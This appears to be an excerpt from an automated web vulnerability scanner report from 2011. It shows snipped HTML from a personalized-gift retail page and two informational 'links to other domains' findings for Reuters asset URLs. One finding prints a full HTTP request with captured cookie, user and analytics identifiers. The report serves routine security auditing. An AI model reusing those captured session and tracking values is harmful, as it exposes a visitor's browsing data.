           <span id="_ctl10_rptProductGroups__ctl0_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ns.com/gifts/Ornament-Canvas-30021167?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Ornament Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/gifts/Needlepoint-Stockings-30019422?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Vintage Handcrafted Needlepoint Stockings" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Snowman-and-Cardinal-Slate-30021291?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Snowman and Cardinal Slate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Winter-Wonderland-Stockings-30054670?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Winter Wonderland Stockings" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ts/Snowman-Cardinal-Doormats-30019054?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG02" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Snowman Cardinal Doormats" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl1_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Kids-Backpacks-30015303?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Kids&#39; Backpacks" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
al-Youth-And-Toddler-Hoodies-30024319?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Embossed Initial Youth And Toddler Hoodies" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_4.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
lStar-and-Butterfly-Nap-Mats-30054546?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="All-Star and Butterfly Nap Mats" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-0_0.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.com/gifts/Rolling-Backpacks-30020599?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Rolling Backpacks" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-3_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ifts/Aluminum-Sports-Bottles-30019101?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG03" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Aluminum Sports Bottles" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
/Baby-Information-Art-Canvas-30047164?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Information Art Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
gers--Ten-Toes-Picture-Frame-30021841?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Ten Fingers &amp; Ten Toes Picture Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_9.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ns.com/gifts/Baby-Name-Frame-30015464?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Name Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
olstered-Rocker-with-Ottoman-30017015?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Upholstered Rocker with Ottoman" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
om/gifts/Baby-Alphabet-Quilt-30016554?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG04" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Alphabet Quilt" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
s/Heart-in-Sand-Framed-Print-30021311?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=1&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart in Sand Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Tub-with-Stand-30021145?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=2&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Galvanized Beverage Tub with Stand" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
strial-Alphabet-Framed-Print-30019088?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=3&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Architectural Alphabet Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
-Wedding--Anniversary-Afghan-30020974?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=4&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heartwarming Wedding &amp; Anniversary Afghan" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ed-Photography-Framed-Prints-30019837?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;viewpos=5&amp;trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_2.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl11__ctl0_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;margin-top:-1px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&amp;cobrand=pcr">Reminder Service</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
life...s special occasions." border="0" href="http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl11__ctl0_FooterLink_berries" href="http://www.berries.com/">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...

18.29. http://www.reuters.com/assets/commentsChild

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:34 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:45:00 GMT
Age: 274
Vary: Accept-Encoding
Content-Length: 5292
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF43 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:45:00 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.30. http://www.reuters.com/assets/newsFlash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

